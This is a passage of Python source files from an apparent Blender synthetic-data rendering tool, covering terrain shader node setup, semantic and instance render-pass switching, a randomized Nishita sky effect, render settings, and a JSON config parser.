noisePhaseShiftMultipleNode.location = (_node_offset[0]+900,_node_offset[1]-600)
_terrain_material.node_tree.links.new(noisePhaseShiftMultipleNode.inputs[0], noisePhaseShiftRate.outputs[0])
_terrain_material.node_tree.links.new(noisePhaseShiftMultipleNode.inputs[1], noisePhaseShiftFrame.outputs[0])
_noise_phase_shift_add_node = _terrain_material.node_tree.nodes.new("ShaderNodeMath")
_noise_phase_shift_add_node.operation = 'ADD'
_noise_phase_shift_add_node.location = (_node_offset[0]+1100,_node_offset[1]-400)
_terrain_material.node_tree.links.new(_noise_phase_shift_add_node.inputs[0], noisePhaseShiftOffset.outputs[0])
_terrain_material.node_tree.links.new(_noise_phase_shift_add_node.inputs[1], noisePhaseShiftMultipleNode.outputs[0])
##########################################
# convert to vector ##############################################
noisePhaseShiftVector = _terrain_material.node_tree.nodes.new("ShaderNodeCombineXYZ")
noisePhaseShiftVector.location = (_node_offset[0]+1200,_node_offset[1]-600)
noisePhaseShiftVector.inputs[0].default_value = 1
noisePhaseShiftVector.inputs[1].default_value = 1
_terrain_material.node_tree.links.new(noisePhaseShiftVector.inputs[2], _noise_phase_shift_add_node.outputs[0])
####################################
for _mapping_node in __noise_mapping_node_ist:
# connect to noise mapping node
_terrain_material.node_tree.links.new(_mapping_node.inputs[3], noisePhaseShiftVector.outputs[0])
# creat diffuse shader for labels: IMPORANT, it has to be piped thorugh a shader, otherwise no information is getting trough the diffuse render channel!
labelDiffuseNode = _terrain_material.node_tree.nodes.new("ShaderNodeBsdfDiffuse")
#labelDiffuseNode = _terrain_material.node_tree.nodes.new("ShaderNodeBsdfDiffuse")
labelDiffuseNode.location = (_node_offset[0]+3700,0)
#labelDiffuseNode.inputs[1].default_value = 1.0 # set roughness to 1. no glossy!
_terrain_material.node_tree.links.new(labelDiffuseNode.inputs[0], _latest_label_output.outputs[0])
# create Pinciple Shade node and link it #############################################
PBSDFNode = _terrain_material.node_tree.nodes.new('ShaderNodeBsdfPrincipled')
PBSDFNode.location = (_node_offset[0]+200,_node_offset[1])
_terrain_material.node_tree.links.new(PBSDFNode.inputs[0], _latest_col_output.outputs[0])
if _latest_spec_output is not None:
_terrain_material.node_tree.links.new(PBSDFNode.inputs[5], _latest_spec_output.outputs[0])
if _latest_rough_output is not None:
_terrain_material.node_tree.links.new(PBSDFNode.inputs[7], _latest_rough_output.outputs[0])
if _latest_nrm_output is not None:
# add normal map
normalMapNode = _terrain_material.node_tree.nodes.new('ShaderNodeNormalMap')
normalMapNode.inputs[0].default_value = general_terrain_cfg['normalStrength']
normalMapNode.location = (_node_offset[0],_node_offset[1])
# link nodes
_terrain_material.node_tree.links.new(normalMapNode.inputs[1], _latest_nrm_output.outputs[0])
#_terrain_material.node_tree.links.new(PBSDFNode.inputs[19], normalMapNode.outputs[0])
_terrain_material.node_tree.links.new(PBSDFNode.inputs[20], normalMapNode.outputs[0])
######################################################################################
# link material output to last node ##################
# add new mix shaders
masterMixShaderNode = _terrain_material.node_tree.nodes.new("ShaderNodeMixShader")
masterMixShaderNode.name = "rgb-label-mix"
masterMixShaderNode.label = "rgb-label-mix"
masterMixShaderNode.location = (_node_offset[0]+4000,0)
masterMixShaderNode.inputs[0].default_value = 0 # set actual terrain material as default; 1 for gettnig its label
##################
_terrain_material.node_tree.links.new(masterMixShaderNode.inputs[1], PBSDFNode.outputs[0])
_terrain_material.node_tree.links.new(masterMixShaderNode.inputs[2], labelDiffuseNode.outputs[0])
_terrain_material.node_tree.links.new(_material_output.inputs[0], masterMixShaderNode.outputs[0])
############################################################
# add disp mapping node
if _latest_disp_output is not None:
disp_mapping_node = _terrain_material.node_tree.nodes.new("ShaderNodeDisplacement")
disp_mapping_node.inputs[1].default_value = general_terrain_cfg['dispMidLevel']
disp_mapping_node.inputs[2].default_value = general_terrain_cfg['dispScale']
disp_mapping_node.location = (_node_offset[0]+4000,-150)
# link nodes
_terrain_material.node_tree.links.new(disp_mapping_node.inputs[0], _latest_disp_output.outputs[0])
_terrain_material.node_tree.links.new(_material_output.inputs[2], disp_mapping_node.outputs[0])
self._node_tree = _terrain_material
# Pass entries #################################################################################################
# RGBDPass entries #############################################################################################
self.add_pass_entry(pass_name="RGBDPass",
node_handle=masterMixShaderNode,
value_type="inputs",
value=[0,0])
for instance_node in _instance_switching_node_list:
self.add_pass_entry(pass_name="RGBDPass",
node_handle=instance_node,
value_type="inputs",
value=[0,0])
###################################################################################### end of RGBDPass entries #
# SemanticPass entries #########################################################################################
self.add_pass_entry(pass_name="SemanticPass",
node_handle=masterMixShaderNode,
value_type="inputs",
value=[0,1])
for instance_node in _instance_switching_node_list:
self.add_pass_entry(pass_name="SemanticPass",
node_handle=instance_node,
value_type="inputs",
value=[0,0])
################################################################################## end of SemanticPass entries #
# InstancePass entries #########################################################################################
for instance_node in _instance_switching_node_list:
self.add_pass_entry(pass_name="InstancePass",
node_handle=instance_node,
value_type="inputs",
value=[0,1])
################################################################################## end of SemanticPass entries #
########################################################################################## end of Pass entries #
return _terrain_material
def additional_pass_action(self,pass_name, pass_cfg, keyframe):
""" overwrite base function
Args:
pass_name: name of pass to activate [string]
pass_cfg: specific parameters for the pass [dict]
keyframe: current frame number; if value > -1, this should enable also the setting of a keyframe [int]
Returns:
None
"""
# set semantic ID ##############################################################################################
if "SemanticPass" == pass_name:
self._label_ID_node.outputs[0].default_value = pass_cfg["activationID"]+1
if keyframe > -1:
self._label_ID_node.outputs[0].keyframe_insert('default_value', frame=keyframe)
##################################################################### end of set interpolation to constant #
####################################################################################### end of set semantic ID #
if keyframe > -1:
# set interpolation to constant ############################################################################
_fcurves = self._node_tree.node_tree.animation_data.action.fcurves
for fcurve in _fcurves:
for kf in fcurve.keyframe_points:
kf.interpolation = 'CONSTANT'
def getMaterials(self):
return self._material_list
### The following lines are from https://www.poliigon.com/
"""
taken from Poliigon shader! >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
"""
@staticmethod
def load_nodegroup_config(engine_template):
"""Load in json node config for material based on set engine"""
jsonfile = os.path.join(
os.path.dirname(__file__), "engines", engine_template + ".json")
if not os.path.isfile(jsonfile):
print("Missing json file for workflow "+engine_template)
raise Exception("Missing json file for workflow")
with open(jsonfile) as jsonread:
mat_config = json.load(jsonread)
# mat_config = {}
# convert certain things,
# e.g., convert all locations to mathutils.vector(value)
# and turn the lists in the default values into sets/tuples
return mat_config
"""
taken from Poliigon shader! <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
"""
@staticmethod
def socket_type_to_class(type_id):
"""Mapping of input types to class strings"""
if type_id == 'RGBA': #??
return 'NodeSocketColor'
elif type_id == 'VALUE':
return 'NodeSocketFloat'
elif type_id == 'VECTOR':
return 'NodeSocketVector'
elif type_id == 'CUSTOM':
print("WARNING! Mapping custom socket tupe to float")
return 'NodeSocketFloat'
else:
raise Exception('Unknown node socket type: '+type_id)
@staticmethod
def socket_index_from_identifier(node, name, identifier, mode):
"""Get the input or output socket index based on identifier name"""
res = None
# short circuit return for routes, as the identifier doesn't match well
# (ie, identifier="output", but actual index available is "Output")
if node.type == "REROUTE":
return 0 # in either case, to or from
if mode == 'from':
iterset = node.outputs
elif mode == 'to':
iterset = node.inputs
else:
raise Exception('Invalid mode for socket identifier')
sockets = [sock.name for sock in iterset
if sock.name] # ignore empty string names... e.g. in principled shader
if len(sockets) == len(set(sockets)):
# all values are unique, we can use the Socket name directly
res = name
else:
# print("Names not unique in: ", sockets)
# Names not unique, fallback to using the identifier
for i, socket in enumerate(iterset):
# print(i, socket, socket.identifier, identifier)
if socket.identifier == identifier:
res = i
break
if res is None:
print('Could not determine node socket from input:')
print(node, identifier, mode)
raise Exception('Could not determine node socket from input')
return res
"""
taken from Poliigon shader! >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>
"""
def create_nodegroup_from_config(self, mat_config):
"""Given a dictionary json object, create a node group"""
#self.material.name = 'blub'
self.verbose = True
nodegroup = bpy.data.node_groups.new(
'_mapping_node', type='ShaderNodeTree')
m_nodes = nodegroup.nodes
m_links = nodegroup.links
# cache nodes for applying color space, as with later 2.8 builds we
# can only do this after the image has been assigned to the node
apply_colorspaces = []
frames_with_children = []
for node_name, node_data in mat_config["nodes"].items():
if not hasattr(bpy.types, node_data["type_id"]):
if self.verbose:
print("Node not available here")
mat_config["nodes"][node_name]["datablock"] = None
continue
node = m_nodes.new(node_data["type_id"])
node.select = False
mat_config["nodes"][node_name]["datablock"] = node
node.name = node_name
if 'reroute' not in node_name.lower():
node.label = mat_config["nodes"][node_name]['label']
for key, value in node_data.items():
if key in {"type", "type_id", "datablock", "COMMENT_ONLY"}:
continue
if hasattr(value, '__call__'):
value = value()
if key=='color_space':
# special apply cases, to support newer 2.8 builds
apply_colorspaces.append([node, value])
elif key=='parent':
frames_with_children.append(value)
# apply parent (frame) to node if any
# setattr(node, key, mat_config["nodes"][value]["datablock"])
pass # TODO, get this working in 2.7
elif key=='text':
if node.name not in bpy.data.texts:
txtblock = bpy.data.texts.new(node.name)
txtblock.write(value)
else:
txtblock = bpy.data.texts[node.name]
node.text = txtblock
else: # general case
setattr(node, key, value)
# TODO: remove if 2.8 special spacing no longer needed
# # fix 2.8 node spacing
# if bpy.app.version >= (2, 80):
# # image nodes are wider now, move farther left
# if node.location[0] <= -430:
# node.location[0] -= 200
# if node_name == "Principled BSDF":
# node.location[1] += 50
# #node.location[0] *= 1.2 # space out nodes some more
# Apply the parents for nodes, now that all nodes exist
for node_name, node_data in mat_config["nodes"].items():
for key, value in node_data.items():
node = mat_config["nodes"][node_name]["datablock"]
if key!='parent':
continue
# apply parent (frame) to node if any
setattr(node, key, mat_config["nodes"][value]["datablock"])
# Repeat-apply location for frames
for node_name, node_data in mat_config["nodes"].items():
node = mat_config["nodes"][node_name]["datablock"]
if node.type != 'FRAME':
continue
elif node_name in frames_with_children:
# double coordinates for frames with children to show up right
node.location = [node_data['location'][0]*2, node_data['location'][1]*2]
else:
node.location = [node_data['location'][0], node_data['location'][1]]
# Create the group input and output sockets
for i, socket in enumerate(mat_config["inputs"]):
nodegroup.inputs.new(
self.socket_type_to_class(socket['type']), socket['name'])
if 'min' in socket:
nodegroup.inputs[i].min_value = socket['min']
if 'max' in socket:
nodegroup.inputs[i].max_value = socket['max']
nodegroup.inputs[i].default_value = socket['default']
for i, socket in enumerate(mat_config["outputs"]):
nodegroup.outputs.new(
self.socket_type_to_class(socket['type']), socket['name'])
if 'min' in socket:
nodegroup.outputs[i].min_value = socket['min']
if 'max' in socket:
nodegroup.outputs[i].max_value = socket['max']
nodegroup.outputs[i].default_value = socket['default']
if "COLOR" in mat_config and mat_config["nodes"]["COLOR"]["datablock"]:
# To set the diffuse color texture preview in cycles texture mode
mat_config["nodes"]["COLOR"]["datablock"].select = True
m_nodes.active = mat_config["nodes"]["COLOR"]["datablock"]
# Linking
for lnk in mat_config["links"]:
from_node = lnk['from']
from_socket = lnk['from_socket']
to_node = lnk['to']
to_socket = lnk['to_socket']
if not mat_config["nodes"][from_node] or not mat_config["nodes"][to_node]:
continue
# resolve the to_socket and from_socket to *index* (not name) input
# based on original key of '_socket.identifier' (uniquely named)
from_index = self.socket_index_from_identifier(
mat_config["nodes"][from_node]["datablock"],
from_socket, lnk['from_id'], 'from')
to_index = self.socket_index_from_identifier(
mat_config["nodes"][to_node]["datablock"],
to_socket, lnk['to_id'], 'to')
if from_index is None or to_index is None:
if self.verbose:
print("Skipping link, could not fetch index")
continue
m_links.new(
# mat_config["nodes"][from_node]["datablock"].outputs[from_socket],
# mat_config["nodes"][to_node]["datablock"].inputs[to_socket])
mat_config["nodes"][from_node]["datablock"].outputs[from_index],
mat_config["nodes"][to_node]["datablock"].inputs[to_index])
# updating defaults
for d_set in mat_config["defaults"]:
node = d_set['node']
socket = d_set['socket']
value = d_set['value']
socket_id = self.socket_index_from_identifier(
mat_config["nodes"][node]["datablock"],
d_set['socket'], d_set['socket_id'], 'to')
try:
mat_config["nodes"][node]["datablock"].inputs[socket_id].default_value = value
except Exception as err:
print("Poliigon: Error setting default node value: ", node, socket, socket_id, value, str(err))
return nodegroup
"""
taken from Poliigon shader! <<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<<
"""
```
#### File: src/assets/TSSAsset.py
```python
import bpy
# utility imports
import numpy as np
import csv
import random
import importlib
from src.TSSBase import TSSBase
from src.tools.NodeTools import NodeTools
class TSSAsset(TSSBase,NodeTools):
"""docstring for TSSAsset"""
def __init__(self):
super(TSSAsset, self).__init__()
# class vars ###################################################################################################
############################################################################################ end of class vars #
def _reset(self):
""" reset all local vars
Args:
None
Returns:
None
"""
pass
def _print_msg(self,skk): print("\033[94m {}\033[00m" .format(skk))
def create(self):
pass
def step(self):
pass
```
#### File: src/assets/TSSMaterial.py
```python
import bpy
# utility imports
import numpy as np
import csv
import random
import importlib
from src.assets.TSSAsset import TSSAsset
from src.assets.TSSModifieres import TSSModifieres
class TSSMaterial(TSSAsset,TSSModifieres):
"""docstring for TSSMaterial"""
def __init__(self):
super(TSSMaterial, self).__init__()
# class vars ###################################################################################################
self._material = None
self._node_tree = None
############################################################################################ end of class vars #
def reset_module(self):
""" reset all local vars
Args:
None
Returns:
None
"""
self._material = None
self._node_tree = None
self.reset()
def set_material(self,material):
self._material = material
def get_material(self):
return self._material
def create(self):
pass
def step(self):
pass
def additional_pass_action(self,pass_name, pass_cfg, keyframe):
""" overwrite base function
Args:
pass_name: name of pass to activate [string]
pass_cfg: specific parameters for the pass [dict]
keyframe: current frame number; if value > -1, this should enable also the setting of a keyframe [int]
Returns:
None
"""
if keyframe > -1:
# set interpolation to constant ############################################################################
self._set_keyframe_interpolation(node_tree=self._node_tree,interpolation='CONSTANT')
```
#### File: environment_effects/effects/EnvLightBlenderSky.py
```python
import bpy
# utility imports
import random
import math
from src.TSSBase import TSSBase
from src.environment_effects.TSSEnvironmentEffects import TSSEnvironmentEffects
class EnvLightBlenderSky(TSSEnvironmentEffects):
"""docstring for EnvLightBlenderSky"""
def __init__(self):
super(EnvLightBlenderSky, self).__init__()
# class vars ###################################################################################################
self._sky_node = None
self._label_ID_Node = None
self._last_keyframe = -1
############################################################################################ end of class vars #
def reset(self):
""" reset function
Args:
None
Returns:
None
"""
# class vars ###################################################################################################
self._sky_node = None
self._label_ID_Node = None
self._last_keyframe = -1
############################################################################################ end of class vars #
def _add_sky(self, last_element, node_offset=[0,0]):
""" function to create sky
Args:
last_element: last element of node tree [blObject]
node_offset: offset position for nodes [x,y] [list]
Returns:
None
"""
# create sky shader ############################################################################################
self._sky_node = self._world_node_tree.node_tree.nodes.new('ShaderNodeTexSky')
self._sky_node.location = (node_offset[0]-2000,node_offset[1]+300)
##################################################################################### end of create sky shader #
# attach last output to Background Shader node #################################################################
_str = self._world_node_tree.node_tree.nodes["World Output"].inputs[0]
_current_last_output = self._sky_node.outputs[0]
########################################################## end of attach last output to Background Shader node #
# mix rgb to mix last_element with sky #########################################################################
if last_element is not None:
_mix_node = self._world_node_tree.node_tree.nodes.new('ShaderNodeMixRGB')
_mix_node.location = (node_offset[0]-1500,node_offset[1]+300)
self._world_node_tree.inputs[0].default_value = 1.0
self._world_node_tree.blend_type = 'OVERLAY'
self._world_node_tree.node_tree.links.new(_mix_node.inputs[1],last_element)
self._world_node_tree.node_tree.links.new(_mix_node.inputs[2],self._sky_node.outputs[0])
_current_last_output = _mix_node.outputs[0]
################################################################## end of mix rgb to mix last_element with sky #
# set semantic nodes ###########################################################################################
# get label vector from cfg
_label_ID_vec = self._cfg["passParams"]["SemanticPass"]["semanticIDVec"]
# create switching nodes for semantics
_semantic_switching_node,self._label_ID_Node = self.create_semantic_nodes( node_tree=self._world_node_tree,
label_ID_vec=_label_ID_vec,
num_label_per_channel=15)
# link switching nodes with tree
self._world_node_tree.node_tree.links.new(_semantic_switching_node.inputs[1], _current_last_output)
# update current last output
_current_last_output = _semantic_switching_node.outputs[0]
#################################################################################### end of set semantic nodes #
# set instance nodes ###########################################################################################
_label_ID_vec = [0]
# create switching nodes for semantics
_instance_switching_node = self.create_single_semantic_node(node_tree=self._world_node_tree,
label_ID=_label_ID_vec[0],
num_label_per_channel=15,
node_offset=[-2000,-2000])
# link switching nodes with tree
self._world_node_tree.node_tree.links.new(_instance_switching_node.inputs[1], _current_last_output)
# update current last output
_current_last_output = _instance_switching_node.outputs[0]
#################################################################################### end of set instance nodes #
# Pass entries #################################################################################################
# RGBDPass entries #############################################################################################
self.add_pass_entry(pass_name="RGBDPass",
node_handle=_semantic_switching_node,
value_type="inputs",
value=[0,0])
self.add_pass_entry(pass_name="RGBDPass",
node_handle=_instance_switching_node,
value_type="inputs",
value=[0,0])
###################################################################################### end of RGBDPass entries #
# SemanticPass entries #########################################################################################
self.add_pass_entry(pass_name="SemanticPass",
node_handle=_semantic_switching_node,
value_type="inputs",
value=[0,1])
self.add_pass_entry(pass_name="SemanticPass",
node_handle=_instance_switching_node,
value_type="inputs",
value=[0,0])
################################################################################## end of SemanticPass entries #
# SemanticPass entries #########################################################################################
self.add_pass_entry(pass_name="InstancePass",
node_handle=_instance_switching_node,
value_type="inputs",
value=[0,1])
################################################################################## end of SemanticPass entries #
########################################################################################## end of Pass entries #
# return handle to last output node
return _current_last_output
def additional_pass_action(self,pass_name, pass_cfg, keyframe):
""" overwrite base function
Args:
pass_name: name of pass to activate [string]
pass_cfg: specific parameters for the pass [dict]
keyframe: current frame number; if value > -1, this should enable also the setting of a keyframe [int]
Returns:
None
"""
# set semantic ID ##############################################################################################
if "SemanticPass" == pass_name:
self._label_ID_Node.outputs[0].default_value = pass_cfg["activationID"]+1
if keyframe > -1:
self._label_ID_Node.outputs[0].keyframe_insert('default_value', frame=keyframe)
####################################################################################### end of set semantic ID #
def _get_random_number(self,min_max_array):
""" get random number from array; use uniformal distribution
Args:
min_max_array: define min and max value [min_value, max_value] [float,float]; if just one value is
added to list, the same value is returned
Returns:
return random value [float]
"""
# check length of array and caluclate random number ############################################################
if len(min_max_array) > 1:
return random.uniform(min_max_array[0],min_max_array[1])
else:
return min_max_array[0]
##################################################### end of check length of array and caluclate random number #
def _set_sky_parameters_NISHITA(self,params,keyframe=-1):
""" set sky NISHITA parameter for current frame
Args:
params: params which are to be set for the sky node [dict]
keyframe: current frame number; if value > -1, this should enable also the setting of a keyframe [int]
Returns:
settings which are choosen for sky node [dict]
"""
# local vars ###################################################################################################
_current_settings = {}
############################################################################################ end of local vars #
# set sky type to NISHITA
self._sky_node.sky_type = 'NISHITA'
_current_settings['SkyType'] = 'NISHITA'
# generate values for sky node and apply to node ###############################################################
# set size of sun ##############################################################################################
_current_settings['SunSize'] = self._get_random_number(params['SunSize'])
self._sky_node.sun_size = math.radians(_current_settings['SunSize'])
####################################################################################### end of set size of sun #
# set sun intensity ############################################################################################
_current_settings['SunIntensity'] = self._get_random_number(params['SunIntensity'])
self._sky_node.sun_intensity = _current_settings['SunIntensity']
##################################################################################### end of set sun intensity #
# set evaluation of sun ########################################################################################
_current_settings['SunElevation'] = self._get_random_number(params['SunElevation'])
self._sky_node.sun_elevation = math.radians(_current_settings['SunElevation'])
################################################################################# end of set evaluation of sun #
# set rotation of sun ##########################################################################################
_current_settings['SunRotation'] = self._get_random_number(params['SunRotation'])
self._sky_node.sun_rotation = math.radians(_current_settings['SunRotation'])
################################################################################## end of set rotation of sun #
# set altitude of sun ##########################################################################################
_current_settings['SunAltitude'] = self._get_random_number(params['SunAltitude'])
self._sky_node.altitude = _current_settings['SunAltitude']
################################################################################### end of set altitude of sun #
# set air density value ########################################################################################
_current_settings['AirDensity'] = self._get_random_number(params['AirDensity'])
self._sky_node.air_density = _current_settings['AirDensity']
################################################################################# end of set air density value #
# set dust desnity value #######################################################################################
_current_settings['DustDensity'] = self._get_random_number(params['DustDensity'])
self._sky_node.dust_density = _current_settings['DustDensity']
################################################################################ end of set dust desnity value #
# set ozone density value ######################################################################################
_current_settings['OzoneDensity'] = self._get_random_number(params['OzoneDensity'])
self._sky_node.ozone_density = _current_settings['OzoneDensity']
############################################################################### end of set ozone density value #
######################################################## end of generate values for sky node and apply to node #
# set keyframe if requested ####################################################################################
if keyframe > -1:
self._sky_node.keyframe_insert('sun_size', frame=keyframe)
self._sky_node.keyframe_insert('sun_intensity', frame=keyframe)
self._sky_node.keyframe_insert('sun_elevation', frame=keyframe)
self._sky_node.keyframe_insert('sun_rotation', frame=keyframe)
self._sky_node.keyframe_insert('altitude', frame=keyframe)
self._sky_node.keyframe_insert('air_density', frame=keyframe)
self._sky_node.keyframe_insert('dust_density', frame=keyframe)
self._sky_node.keyframe_insert('ozone_density', frame=keyframe)
# set interpolation to constant ############################################################################
_fcurves = self._world_node_tree.node_tree.animation_data.action.fcurves
for fcurve in _fcurves:
for kf in fcurve.keyframe_points:
kf.interpolation = 'CONSTANT'
##################################################################### end of set interpolation to constant #
############################################################################# end of set keyframe if requested #
# return choosen settings
return _current_settings
def create(self,last_element=None):
""" create function
Args:
last_element: current last element in node tree [blObject]
Returns:
return new last element [blObject]
"""
# add sky
return self._add_sky(last_element=last_element,node_offset=self._node_offset)
def step(self,keyframe):
""" step function
Args:
keyframe: current frame number; if value > -1, this should enable also the setting of a keyframe [int]
Returns:
None
"""
self._set_sky_parameters_NISHITA(params=self._cfg, keyframe=keyframe)
```
#### File: src/environment_effects/TSSEnvironmentEffects.py
```python
import bpy
# utility imports
import numpy as np
import csv
import random
import importlib
# TSS specific imports
from src.TSSBase import TSSBase
from src.tools.NodeTools import NodeTools
class TSSEnvironmentEffects(TSSBase,NodeTools):
"""docstring for TSSEnvironmentEffects
base class for Environment Effects
"""
def __init__(self):
super(TSSEnvironmentEffects, self).__init__()
# class vars ###################################################################################################
self._world_node_tree = None # world node tree [blObject]
self._render_layers_node = None # render passes node in compositor [blObject]
self._node_offset = [0,0] # node offsets for nodes in compositor [blObject]
############################################################################################ end of class vars #
def reset_module(self):
""" reset all local vars
DO NOT OVERWRITE!
Args:
None
Returns:
None
"""
# call internal reset functions ################################################################################
self.reset()
self.reset_base()
######################################################################### end of call internal reset functions #
# reset base class vars ########################################################################################
self._world_node_tree = None
self._render_layers_node = None
self._node_offset = [0,0]
################################################################################# end of reset base class vars #
def reset(self):
""" specific reset function
OVERWRITE!
Args:
None
Returns:
None
"""
pass
def set_world_node_tree(self,world_node_tree):
""" set world node tree
DO NOT OVERWRITE!
Args:
world_node_tree: world node tree [blObject]
Returns:
None
"""
self._world_node_tree = world_node_tree
def set_render_layers_node(self,render_layers_node):
""" set main render passes node
DO NOT OVERWRITE!
Args:
render_layers_node: render layer node [blObject]
Returns:
None
"""
self._render_layers_node = render_layers_node
def set_node_offset(self,node_offset):
""" set node offset
DO NOT OVERWRITE!
Args:
node_offset: node offset [x,y]
Returns:
None
"""
self._node_offset = node_offset
def _print_msg(self,skk): print("\033[94m {}\033[00m" .format(skk))
def create(self):
""" create function
OVERWRITE!
Args:
None
Returns:
None
"""
pass
def step(self):
""" step function
OVERWRITE!
Args:
None
Returns:
None
"""
pass
```
#### File: src/handle/TSSRenderHandle.py
```python
import bpy
# utility imports
import numpy as np
# system imports
import sys
import os
import pathlib
import importlib
from datetime import datetime
class TSSRenderHandle(object):
"""docstring for TSSRenderHandle"""
def __init__(self):
super(TSSRenderHandle, self).__init__()
# class vars ###################################################################################################
self._pass_list = []
self._cfg = {}
self._outputPath = ""
self._global_step_index = 1
self._compositor_pass_list = {}
############################################################################################ end of class vars #
def reset_module(self):
# reset all render_pass ########################################################################################
for render_pass in self._pass_list:
# reset render_pass
render_pass.reset_module()
# maybe osbolete in future versions
del render_pass
################################################################################# end of reset all render_pass #
self._compositor_pass_list = {}
self._pass_list = []
def _create_passes(self,cfg,general_cfg,node_tree):
for ii, render_pass in enumerate(cfg):
try:
# import module and create class #######################################################################
_module_name = "src.rendering.passes." + render_pass["type"]
_module = importlib.import_module(_module_name)
_class = getattr(_module, render_pass["type"])
_render_pass = _class(pass_name=render_pass["type"])
################################################################ end of import module and create class #
# set pass params and create pass ######################################################################
general_cfg["outputPath"] = self._outputPath
# set general cfg
_render_pass.set_general_cfg(cfg=general_cfg)
# update sensor cfg
_render_pass.update_cfg(cfg=render_pass["passParams"])
# set node offset for organized node tree
_render_pass.set_node_offset(node_offset=[1000,2000*ii])
# set node tree handle
_render_pass.set_node_tree(node_tree=node_tree)
# set global step index
_render_pass.set_global_step_index(index = self._global_step_index)
# set compositor_pass_list
_render_pass.set_compositor_pass_list(compositor_pass_list = self._compositor_pass_list)
# create pass
_render_pass.create()
############################################################### end of set pass params and create pass #
# add pass to list
self._pass_list.append(_render_pass)
except ImportError:
# manage import error
raise Exception("Cannot add render pass")
return -1
return 0
def get_render_pass_list(self):
return self._pass_list
def update_cfg(self,cfg):
""" set cfg dict for object
DO NOT OVERWRITE!
Args:
cfg: cfg dict of class [dict]
Returns:
None
"""
self._cfg = cfg
def _set_render_settings(self,renderCfg):
# setup render engine
bpy.context.scene.render.engine = renderCfg['renderEngine']
bpy.context.scene.cycles.feature_set = renderCfg['renderFeatureSet']
if renderCfg['renderDevice'] == 'GPU':
bpy.context.preferences.addons["cycles"].preferences.compute_device_type = "CUDA"
bpy.context.preferences.addons["cycles"].preferences.get_devices()
bpy.context.scene.cycles.device = renderCfg['renderDevice'] # this is just for the GUI mode
bpy.data.scenes["Scene"].cycles.device= renderCfg['renderDevice'] # this is for cmd mode
# create output folder
# TODO: shift this to button "render scene"
# performance settings
bpy.context.scene.render.tile_x = renderCfg['performanceTilesX']
bpy.context.scene.render.tile_y = renderCfg['performanceTilesY']
# activate renderChannels ###############################################################
# deactive by default all render channels
bpy.context.scene.view_layers["View Layer"].use_pass_combined = False
bpy.context.scene.view_layers["View Layer"].use_pass_z = True
bpy.context.scene.view_layers["View Layer"].use_pass_mist = False
bpy.context.scene.view_layers["View Layer"].use_pass_normal = False
bpy.context.scene.view_layers["View Layer"].use_pass_vector = False
bpy.context.scene.view_layers["View Layer"].use_pass_uv = False
bpy.context.scene.view_layers["View Layer"].use_pass_object_index = False
bpy.context.scene.view_layers["View Layer"].use_pass_material_index = False
bpy.context.scene.view_layers["View Layer"].use_pass_diffuse_color = True
def set_compositor_pass_list(self,compositor_pass_list):
self._compositor_pass_list = compositor_pass_list
def set_output_folder(self,output_folder_path):
self._outputPath = output_folder_path
def create(self):
# set basic parameter ##########################################################################################
# bpy.context.scene.frame_end = numberFrames TODO what about that?
bpy.context.scene.render.image_settings.color_mode = 'RGB'
bpy.context.scene.render.film_transparent = False # TODO: should be an option in cfg
################################################################################### end of set basic parameter #
self._set_render_settings(renderCfg=self._cfg["GENERAL"])
# setup compositor #############################################################################################
#bpy.context.scene.use_nodes = True
_tree = bpy.context.scene.node_tree
# create input image node
if not "CompositorNodeRLayers" in self._compositor_pass_list:
_render_layers_node = _tree.nodes.new(type='CompositorNodeRLayers')
_render_layers_node.name = 'TSSCompositorNodeRLayers'
self._compositor_pass_list["CompositorNodeRLayers"] = _render_layers_node
###################################################################################### end of setup compositor #
# load render pass objects #####################################################################################
self._create_passes(cfg=self._cfg["RENDER_PASSES"],
general_cfg=self._cfg["GENERAL"],
node_tree=_tree)
############################################################################## end of load render pass objects #
def step(self, keyframe=-1):
self._global_step_index += 1
for render_pass in self._pass_list:
render_pass.increase_global_step_index()
def activate_pass(self, pass_name, pass_cfg, keyframe = -1):
pass
def deactivate_pass(self, pass_name, pass_cfg, keyframe = -1):
pass
```
#### File: src/tools/cfg_parser.py
```python
import bpy
# system imports
import json
import copy as cp
class CCfgParser():
def __init__(self):
super(CCfgParser, self).__init__()
self.simulationSetupDict = None
self.renderSetupDict = None
self.postEffectsSetupDict = None
self.cameraDict = None
self.lightSetupDict = None
self.assetsDict = None
self.jsonDict = None
self.envDict = None
def readInCfg(self, cfgPath):
with open(cfgPath, 'r') as f:
# load json file
self.jsonDict = json.load(f)
# read in dicts for specific setups
self.simulationSetupDict = self.jsonDict['SIMULATION_SETUP']
self.renderSetupDict = self.jsonDict['RENDER_SETUP']
self.postEffectsSetupDict = self.jsonDict['RENDER_POST_PROCESSING_EFFECTS_SETUP']
#self.cameraDict = self.jsonDict['cameraSetup']
#self.lightSetupDict = self.jsonDict['lightSetup']
self.assetsDict = self.jsonDict['ASSET_SETUP']
self.envDict = self.jsonDict['ENVIRONMENT_EFFECTS_SETUP']
self.sensorDict = self.jsonDict['SENSOR_SETUP']
# go through terrain cfg and replace template cfg by cfg
#self.loadTemplateForAssets()
def loadTemplateForAssets(self):
for terrainSample in self.assetsDict["terrains"]:
self.loadTemplate(terrainSample)
def loadTemplate(self, cfg):
if "templatePath" in cfg:
with open(cfg["templatePath"], 'r') as templateFile:
_overwriteDict = cp.deepcopy(cfg)
_templateDict = json.load(templateFile)
# load template keys
for templateSample in _templateDict:
cfg[templateSample] = _templateDict[templateSample]
# load overwrite keys
for overwriteSample in _overwriteDict:
cfg[overwriteSample] = _overwriteDict[overwriteSample]
def getSimulationSetupCFG(self):
return self.simulationSetupDict
def getEnvSetupCFG(self):
return self.envDict
def getRenderSetupCFG(self):
return self.renderSetupDict
def getPostEffectSetupCFG(self):
return self.postEffectsSetupDict
def getSensorSetupCFG(self):
return self.sensorDict
def getLightSetupCFG(self):
return self.lightSetupDict
def getAssetsCFG(self):
return self.assetsDict
```
#### File: src/tools/depth_dummy.py
```python
bl_info = {
"name": "distance_to_depth",
"author": "<NAME>",
"version": (1, 0, 0),
"blender": (2, 80, 0),
"location": "Compositor",
"description": "Provides a compositor node to convert distance images to depth images",
"category": "Compositor",
